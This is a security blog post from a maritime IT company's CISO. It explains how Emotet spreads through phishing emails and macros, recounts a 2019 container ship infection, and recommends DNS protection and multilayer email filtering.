The current Emotet malware threat: How can you protect your fleet?
Written by Geir Inge Jensen, CISO | 26 October 2020
Stay up to date!
* By subscribing to the latest news from our blog, you consent to us storing your email address, and sending you monthly emails. You can, at any time, retract this consent.
Having been dormant since February, the notorious Emotet malware resurged in July. Since August, there has been a 1,000 percent increase in malicious cyber actors targeting industries worldwide with phishing emails.
This makes it one of the biggest cyberattacks ever. And the threat is ongoing. Cyber defences all over the world are struggling to combat this malware.
What are the most effective mitigation measures your shipping company should implement?
Let’s take a closer look at the Emotet malware to identify the best ‘antidote’.
What is Emotet malware?
Emotet is an advanced Trojan commonly functioning as a downloader or dropper of other malware. It primarily spreads via phishing emails that often contain familiar branding, mimicking the email format of well-known and trusted companies such as PayPal or DHL to convince users.
Once clicked, the phishing attachments and links launch the payload. The malware then attempts to proliferate within a network by brute-forcing user credentials and writing to shared drives.
The Emotet malware changes every day.
The Department of Homeland Security referred to Emotet in a 2018 advisory as “among the most costly and destructive malware,” costing on average $1 million per attack to fix.
Dualog cannot stress this enough: Emotet is a clear and present danger for ships. In February 2019, a U.S.-flagged ultra-large container ship bound for New York City was infected with Emotet, destroying its network.
Container ship attack and U.S. Coast Guard warning
According to a sobering Wall Street Journal article, the container ship’s crew reported that their shipboard network had been “totally debilitated” by malware. They were unable to resolve the issue, and neither could the shipping company’s onshore system administrators.
The U.S. Coast Guard contacted the FBI and then sent its own cyber specialists team to assess the damage on board. It turned out the malware had infiltrated the ship’s network “due to an almost total lack of cybersecurity safeguards”.
The 2019 Emotet attack raised concerns about the state of cybersecurity in the commercial maritime shipping industry, resulting in the U.S. Coast Guard issuing an alert that warns the maritime shipping industry that it should be taking basic precautions against cyberattacks.
For maritime shipping companies, the alert states, cybersecurity is as much of a priority as “controlling physical access or performing routine maintenance.”
Emotet has an initial attack vector through either a macro in an attached Word document or a phishing link in the message body. Later revisions of the attack password protect the document or zip file and trick the receiver into enabling macros for the document.
Once activated, the macro will run a command session that starts PowerShell and then downloads the real Emotet malware from one of five locations. The malware itself is very advanced and will utilise more than 20 attack vectors to spread locally on the infected machine’s network. If any computer on the network is outdated, lacking the latest security patches, it will most likely also be infected. In this regard, Emotet acts as a worm.
In addition to spreading through unpatched security vulnerabilities, Emotet will brute-force passwords of user accounts and, once successful, will read all the Outlook data available. The message bodies are sent back to the botnets and changed slightly before being sent out to all the email addresses found in that outlook mailbox. These emails will be very similar to real messages, with dates and numbers changed, as well as with a slightly modified subject and a random sender address. The emails will most likely have a modified version of Emotet malware attached, in an effort to bypass virus scanners.
Effective mitigation measures
Earlier this month, Trickbot – one of the biggest botnets behind Emotet – was taken down by U.S. Cyber Command and a private coalition led by Microsoft. This was believed to be a major setback for the Emotet malware. However, the disruption of Trickbot was short-lived. Last week, it bounced back.
So, is there an effective cure for this malady?
Yes. As the saying goes, prevention is better than the cure.
To secure your ships against Emotet malware, implement the following mitigation measures:
As Emotet relies on phishing links and fetching the payload over the Internet, DNS protection will be very effective. In addition, the C2 traffic sending email messages back to the botnet will be blocked.
Email is the primary Emotet attack vector. To maximise your chances of preventing this mutated virus from reaching the vessel, you will need a robust multilayer email filtering mechanism using multiple virus scanners that are continuously updated.
Read a full threat report on the Emotet malware here. It lists attack techniques used by Emotet, and recommended mitigations.
Written by Geir Inge Jensen, CISO
Geir Inge Jensen is the Chief Information Security Officer at Dualog. Adding over 20 years of experience in network design and cybersecurity, Geir Inge is passionate about developing solutions and services that help shipping companies create a more cyber-resilient environment onboard their vessels. When he is not fighting maritime cybercrime, you can find him in the mountains enjoying the great outdoors with his camera in hand.